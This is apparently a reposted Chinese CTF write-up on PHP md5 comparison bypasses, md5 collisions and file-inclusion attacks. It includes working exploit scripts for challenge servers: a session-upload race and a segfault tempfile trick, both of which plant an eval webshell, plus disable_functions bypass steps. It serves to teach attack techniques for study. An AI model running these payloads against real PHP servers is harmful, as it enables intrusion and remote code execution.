CTF题型 md5考法例题汇总

news2024/11/28 0:36:23

CTF题型 md5考法相关例题总结

文章目录

  • CTF题型 md5考法相关例题总结
    • 一.md5弱字符相等(==)
      • [SWPUCTF 2021 新生赛]easy_md5
    • 二.md5强字符相等(===)
      • 1)文件相等
      • [2024 qsnctf 擂台赛 easy_md5]
      • 2)字符相等
      • [安洵杯 2019]easy_web
    • 三.md5哈希长度扩展攻击
      • [NPUCTF2020]ezinclude
      • 文件包含利用
        • 1.session文件包含
        • 2.php7 segment fault特性(段错误)
        • 3.包含日志文件(Fail)

一.md5弱字符相等(==)

[SWPUCTF 2021 新生赛]easy_md5

例题 https://www.nssctf.cn/problem/386

关键代码就一行 if ($name != $password && md5($name) == md5($password))

保证 值不相等 而且 md5 值 弱比较相等

因为 md5(数组)将返回 Null

弱比较 进行了类型转换

image-20240319201630120

二.md5强字符相等(===)

1)文件相等

[2024 qsnctf 擂台赛 easy_md5]

有 https://www.qsnctf.com/#/main/driving-range

题目名 :easy_md5

传两个相同的pdf文件

保证md5的值强相等 强相等不会进行自动类型转换 此时不能输入数组了,只能输入字符串

工具:fastcoll 生成md5强相等的字符串

下载地址;http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

image-20240319202610313

可以指定前缀(有些题需要特定前缀)

这里我们新建一个pdf文件

fastcoll_v1.0.0.5.exe test.pdf -o 1.pdf 2.pdf

image-20240319202759911

上传相同两个md5文件

image-20240319203007168

直接拿flag

2)字符相等

[安洵杯 2019]easy_web

题目环境:https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_web

image-20240319203238679

暗示题目和md5有关

image-20240319203612788

开题传了一个img参数

直接传赛博厨子

image-20240319203806837

发现经过两次base64解码和hex解码后得到 图片名

猜测是任意文件读取

尝试读取index.php 同样的操作后 得到结果TmprMlpUWTBOalUzT0RKbE56QTJPRGN3

image-20240319204108827

image-20240319204303087

得到base64内容解码后

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>

成了一道命令执行的题

绕过

preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)

禁止了很多读取文件的命令 ,以及一些符号

就是不禁 /

用 base64 读文件即可

base64 /flag

前面我们用fastcoll生成 md5强相等的文件

在用一个脚本转换为字符即可(根据实际情况改文件名)

<?php 
function readmyfile($path){
 $fh = fopen($path, "rb");
 $data = fread($fh, filesize($path));
 fclose($fh);
 return $data;
}
echo("当前工作目录:".getcwd()."\n");
$a = urlencode(readmyfile(getcwd().'\1.txt'));
$b = urlencode(readmyfile(getcwd().'\2.txt'));
if(md5((string)urldecode($a))===md5((string)urldecode($b))){
echo $a;
echo "\n";
}
if(urldecode($a)!=urldecode($b)){
echo $b;
}

生成文件fastcoll_v1.0.0.5.exe test.txt -o 1.txt 2.txt

通过文件生成两段相同 md5的字符串

image-20240319210928280

%01%BE%A5%8B%7F%C5%2A%3D%E3%9D.%3B%19%0B%A1%1C%A8%AD%03%10%959%8E%2A%3F%AE%83rK%AC%0CE%D4%B9%F9%F2%EEv%E6%D2%EBon%DB%CA%7FPB%3DWP%19%9D%14%5E7c%81%C7%A7%1A%A6%1D%F0%9D%AF.P%D9%2C-%93%ED%01%E4d%B2q%ED%A1%29%F5%84M%16%CB%A7.%7C%15%B4%CF%5B%8C%CDA6%CC%C0%8D%86%0B%7B%F6%1A%96%E7%F0%93j%EFH%82%9F4%0F%5E%91dY%CA%87%DA%FF%D7%E6%11%D3
%01%BE%A5%8B%7F%C5%2A%3D%E3%9D.%3B%19%0B%A1%1C%A8%AD%03%90%959%8E%2A%3F%AE%83rK%AC%0CE%D4%B9%F9%F2%EEv%E6%D2%EBon%DB%CA%FFPB%3DWP%19%9D%14%5E7c%81%C7%27%1A%A6%1D%F0%9D%AF.P%D9%2C-%93%ED%01%E4d%B2q%ED%A1%29%F5%84%CD%16%CB%A7.%7C%15%B4%CF%5B%8C%CDA6%CC%C0%8D%86%0B%7B%F6%1A%96%E7%F0%93%EA%EEH%82%9F4%0F%5E%91dY%CA%87%DA%7F%D7%E6%11%D3

image-20240319211346268

可以成功执行命令

base64 /flag 特殊字符 urlencode一下

image-20240319211446184

可以拿到flag

我看网上都是 用 \ 拼接绕过的(代表命令的续接)

image-20240319211807231

但是不是禁了 \ 吗 https://hiregex.com/

image-20240319212050105

可能非预期了哈哈

三.md5哈希长度扩展攻击

特征;md5(密文+“已知的字符串”)===已知的md5值

求密文的值

就可以判断这题考md5哈希长度扩展攻击

懒鬼专用工具:https://github.com/shellfeel/hash-ext-attack?tab=readme-ov-file

傻瓜式操作+汉化 密钥长度要自己尝试

[NPUCTF2020]ezinclude

题目环境:https://buuoj.cn/challenges#[NPUCTF2020]ezinclude

image-20240319215659508

name pass为空时返回hash (md5的形式)

<!--md5($secret.$name)===$pass -->

说明返回的hash就是 pass的值

居然可以直接传递pass=hash的值 绕过

image-20240319215732707

image-20240319215901607

感觉非预期 烂了 这道题好像和md5哈希长度扩展攻击 关系不大…哈哈哈哈

访问 flflflflag.php 出题人有点阴险 故意做了一个重定向

image-20240319220825635

变成一个文件包含的问题 包含/etc/passwd 可以正常包含

image-20240319221232434

用伪协议直接包含/flag 无回显

看看 flflflflag.php 源码

?file=php://filter/convert.base64-encode/resource=flflflflag.php

<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
	die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>

文件包含利用

续接上题 文件包含利用

1.session文件包含

利用session.upload_progress

可控sess临时文件名 进行条件竞争 实现在 sess文件被自动清理之前被执行

payload

import io
import sys
import requests
import threading

host = 'http://a407b462-0749-4249-a31f-817881e6edfd.node5.buuoj.cn:81/flflflflag.php'
sessid = 'test'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            host,
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php phpinfo();fputs(fopen('1.php','w'),'<?php eval($_POST[1])?>');?>"},
            files={"file":('a.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'{host}?file=/tmp/sess_{sessid}')
        if 'php.net' not in response.text: #代表未成功写入
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)

with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()
    READ(session)

退出后访问1.php

image-20240320004745122

可以在环境变量中找到flag

2.php7 segment fault特性(段错误)

php7 segment fault特性:当PHP异常退出时,POST的临时文件会被保留(无论网站是不是在POST方法里接收了文件,只要传了就会被当成临时文件保留)

保存在 /tmp目录

利用条件:

php7.0.0-7.1.2可以利用, 7.1.2x版本的已被修复
php7.1.3-7.2.1可以利用, 7.2.1x版本的已被修复
php7.2.2-7.2.8可以利用, 7.2.9一直到7.3到现在的版本已被修复
可以获取文件名

image-20240319225446509

php环境可以利用

常用崩溃payloadphp://filter/string.strip_tags/resource=/etc/passwd"

看网上都是通过dirsearch发现dir.php 文件
在这里插入图片描述

?file=php://filter/convert.base64-encode/resource=dir.php

读取源码

<?php
var_dump(scandir('/tmp'));
?>

发现扫描了 /tmp目录 可以拿/tmp目录的文件名

结合php7 segment fault特性

利用脚本

import requests
from io import BytesIO
url="http://d1fdd60d-2b91-4eec-b515-b332b741eac1.node4.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
payload="<?php eval($_POST[1]);?>"
files={
    "file":BytesIO(payload.encode())
}
r=requests.post(url=url,files=files,allow_redirects=False)

print(r.text)

image-20240319225748383

页面崩溃 一切顺利

访问dir.php

image-20240319225844880

可以拿到文件名 php2Bhnht

包含 php奔溃文件 echo(123)可以回显

image-20240319230341463

查看 phpinfo();

image-20240319230943658

发现flag在环境变量里

image-20240319232912362

发现开启了disable_functions

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,scadnir,readfile,show_source,fpassthru,readdir

禁用了许多系统函数 尝试绕过disable_functions

直接丢给蚁剑 用蚁剑终端

返回ret=127 说明disable_functions生效

image-20240319231602457

用蚁剑的插件绕过

image-20240319231410135

发现flag在环境变量里

image-20240319232756099

3.包含日志文件(Fail)

一般日志位置:

nginx : /var/log/nginx/access.log

apache2: /var/log/apache2/access.log

image-20240320001218824

没有进行记录,不可利用

换种思路 利用当前程序的环境变量

用虚拟文件系统…/…/…/…/proc/self/environ

HTTP_User_Agent塞php脚本

读不到/proc/self/environ 也不行

可能也可以用php filter chain 直接rce 绕过

之后有空写个文件包含专题吧

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1536380.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

深入技术细节:放弃Spring Security,自己实现Token权限控制!

最近做了个项目&#xff0c;大家都知道很多的项目都是在自己手上原本的框架内进行业务开发。但是甲方爸爸的这个项目需要交付原代码&#xff0c;并且要求框架逻辑简单清晰&#xff0c;二次开发简易上手。 那不是要重新从0到1写一套框架吗&#xff1f; 试着先给甲方爸爸报一下…

美食杂志制作秘籍:引领潮流,引领味蕾

美食杂志是一种介绍美食文化、烹饪技巧和美食体验的杂志&#xff0c;通过精美的图片和生动的文字&#xff0c;向读者展示各种美食的魅力。那么&#xff0c;如何制作一本既美观又实用的美食杂志呢&#xff1f; 首先&#xff0c;你需要选择一款适合你的制作软件。比如FLBOOK在线制…

Java微服务分布式事务框架seata的TCC模式

&#x1f339;作者主页&#xff1a;青花锁 &#x1f339;简介&#xff1a;Java领域优质创作者&#x1f3c6;、Java微服务架构公号作者&#x1f604; &#x1f339;简历模板、学习资料、面试题库、技术互助 &#x1f339;文末获取联系方式 &#x1f4dd; 往期热门专栏回顾 专栏…

教大家使用vue实现 基础购物车。

首先我要知道一点 其能够数据变化的 都用{{}}来进行渲染类似 来看一下实现效果 实现思路 &#xff1a; 1&#xff0c;引进 vue.js 2,setup 将声明变量 方法放在setup里面 3&#xff0c;用响应式声明 ref&#xff08;&#xff09; 或rective声明 可以声明对象等等 let 也…

AST学习入门

AST学习入门 1.AST在线解析网站 https://astexplorer.net/ 1.type: 表示当前节点的类型&#xff0c;我们常用的类型判断方法t.is********(node)**,就是判断当前的节点是否为某个类型。 2**.start**:表示当前节点的开始位置 3.end:当前节点结束 4.loc : 表示当前节点所在的行…

产品推荐 | 基于Xilinx FPGA XC5VFX100T的6U VPX视频叠加板卡

01、产品概述 本板卡是基于Xilinx FPGA XC5VFX100T的6U VPX视频叠加板卡。主要用于视频叠加板具有多种高清图形输入接口&#xff0c;可实现其中两路高清视频信号的开窗显示和叠加显示功能&#xff1b;或者输出和输入图形接口的转换。 02、物理特性 ● 尺寸&#xff1a;6U CPC…

【文献阅读】AlphaFold touted as next big thing for drug discovery — but is it?

今天来精读2023年10月发在《Nature》上的一篇新闻&#xff1a;AlphaFold touted as next big thing for drug discovery — but is it? (nature.com)https://www.nature.com/articles/d41586-023-02984-w Questions remain about whether the AI tool for predicting protein …

Python Windows系统 虚拟环境使用

目录 1、安装 2、激活 3、停止 1、安装 1&#xff09;为项目新建一个目录&#xff08;比如&#xff1a;目录命名为learning_log&#xff09; 2&#xff09;在终端中切换到这个目录 3&#xff09;执行命令&#xff1a;python -m venv ll_env&#xff0c;即可创建一个名为ll…

常用的6个的ChatGPT网站,国内可用!

GPTGod &#x1f310; 链接&#xff1a; GPTGod &#x1f3f7;️ 标签&#xff1a; GPT-4 免费体验 支持API 支持绘图 付费选项 &#x1f4dd; 简介&#xff1a;GPTGod 是一个功能全面的平台&#xff0c;提供GPT-4的强大功能&#xff0c;包括API接入和绘图支持。用户可以选择免…

成都百洲文化传媒有限公司电商新浪潮的领航者

在当今电商行业风起云涌的时代&#xff0c;成都百洲文化传媒有限公司以其独特的视角和专业的服务&#xff0c;成为了众多商家争相合作的伙伴。今天&#xff0c;就让我们一起走进百洲文化的世界&#xff0c;探索其背后的成功密码。 一、百洲文化的崛起之路 成都百洲文化传媒有限…

短视频矩阵系统---php7.40版本升级自研

短视频矩阵系统---php7.40版本升级自研 1.部署及搭建 相对于其他系统&#xff0c;该系统得开发及部署难度主要在各平台官方应用权限的申请上&#xff0c;据小编了解&#xff0c;目前抖音短视频平台部分权限内侧名额已满&#xff0c;巧妇难为无米之炊&#xff0c;在做相关程序…

unity 添加newtonsoft-json

再git url上添加&#xff1a;com.unity.nuget.newtonsoft-json

手机如何设置静态IP地址显示

随着移动互联网的普及&#xff0c;手机已经成为我们日常生活中不可或缺的一部分。在连接无线网络时&#xff0c;我们有时需要设置手机的IP地址为静态&#xff0c;以满足特定的网络需求或解决某些网络问题。本文将指导您如何在手机上设置静态IP地址显示&#xff0c;让您更好地管…

二、typescript基础语法

一、条件语句 二、函数 1、有名函数 function add(x:number, y:number):number {return x y;}2、匿名函数 let add function (x:number, y:number):number {return x y;}函数可选参数 function buildName(firstname: string, lastname?:string) {if (lastname) {return fi…

蓝牙耳机哪个品牌最好?2024年热门机型推荐合集分享

​随着蓝牙耳机的普及&#xff0c;越来越多的年轻人开始追求这种无线的便利。市场上品牌众多&#xff0c;款式多样&#xff0c;选择起来确实让人眼花缭乱。我整理了一份蓝牙耳机品牌排行榜前十名&#xff0c;希望能为你提供一些参考&#xff0c;帮助你找到心仪的耳机。 一、202…

HarmonyOS实战开发-编写一个分布式邮件系统

概述 本篇Codelab是基于TS扩展的声明式开发范式编程语言编写的一个分布式邮件系统&#xff0c;可以由一台设备拉起另一台设备&#xff0c;每次改动邮件内容&#xff0c;都会同步更新两台设备的信息。效果图如下&#xff1a; 说明&#xff1a; 本示例涉及使用系统接口&#xff…

基于springboot的牙科就诊管理系统

技术&#xff1a;springbootmysqlvue 一、系统背景 当前社会各行业领域竞争压力非常大&#xff0c;随着当前时代的信息化&#xff0c;科学化发展&#xff0c;让社会各行业领域都争相使用新的信息技术&#xff0c;对行业内的各种相关数据进行科学化&#xff0c;规范化管理。这样…

mysql分页查询多用GitCode平台

目录 一、在GitCode平台AI搜索结果&#xff08;这个更优&#xff09; 二、在百度搜索输入“mysql Java分页查询”的输出结果&#xff1a; 三、推荐的文章 四、GitCode的使用 1&#xff09;如搜索jdk11可以直接下载jdk11的包 2&#xff09;搜索开源项目 3&#xff09;如搜…

学浪怎么下载视频_学浪下载视频方法

越来越多人购买了学浪课程&#xff0c;但是苦于学浪视频官方不提供下载选项&#xff0c;于是就有人做了学浪视频下载软件&#xff0c;这里就教大家如何下载你已经购买的学浪课程 本次教程用到的软件都在下面的链接 链接&#xff1a;https://pan.baidu.com/s/1y7vcqILToULrYAp…

网络: 数据链路层

数据链路层: 数据帧的封装与传输 以太网数据帧 源地址和目的地址是指网卡的硬件地址(也叫MAC地址), 长度是48位,是在网卡出厂时固化的;帧协议类型字段有三种值,分别对应IP、ARP、RARP;帧末尾是CRC校验码 以太网 "以太网" 不是一种具体的网络, 而是一种技术标准; 既…